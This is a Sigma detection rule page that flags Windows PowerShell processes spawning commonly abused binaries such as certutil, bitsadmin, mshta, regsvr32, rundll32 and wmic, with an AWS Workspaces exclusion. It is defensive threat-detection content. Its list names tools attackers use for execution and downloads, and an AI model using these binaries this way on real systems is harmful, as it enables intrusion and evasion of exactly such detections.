Potentially Suspicious PowerShell Child Processes
Detects potentially suspicious child processes spawned by PowerShell
Sigma rule (View on GitHub)
1title: Potentially Suspicious PowerShell Child Processes
2id: e4b6d2a7-d8a4-4f19-acbd-943c16d90647
3status: test
4description: Detects potentially suspicious child processes spawned by PowerShell
5references:
6 - https://twitter.com/ankit_anubhav/status/1518835408502620162
7author: Florian Roth (Nextron Systems), Tim Shelton
8date: 2022/04/26
9modified: 2023/05/30
10tags:
11 - attack.execution
12 - attack.t1059.001
13logsource:
14 category: process_creation
15 product: windows
16detection:
17 selection:
18 ParentImage|endswith:
19 - '\powershell_ise.exe'
20 - '\powershell.exe'
21 - '\pwsh.exe'
22 Image|endswith:
23 - '\bash.exe'
24 - '\bitsadmin.exe'
25 - '\certutil.exe'
26 - '\cscript.exe'
27 - '\forfiles.exe'
28 - '\hh.exe'
29 - '\mshta.exe'
30 - '\regsvr32.exe'
31 - '\rundll32.exe'
32 - '\schtasks.exe'
33 - '\scrcons.exe'
34 - '\scriptrunner.exe'
35 - '\sh.exe'
36 - '\wmic.exe'
37 - '\wscript.exe'
38 filter_optional_amazon:
39 ParentCommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\' # AWS Workspaces
40 CommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\' # AWS Workspaces
41 condition: selection and not 1 of filter_optional_*
42falsepositives:
43 - Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed.
44level: high
References
Related rules
- Certificate Exported Via PowerShell
- Obfuscation and Escape Characters - Powershell
- PowerShell -encodedcommand Switch
- PowerShell Base64 Encoding
- Suspicious PowerShell Cmdlets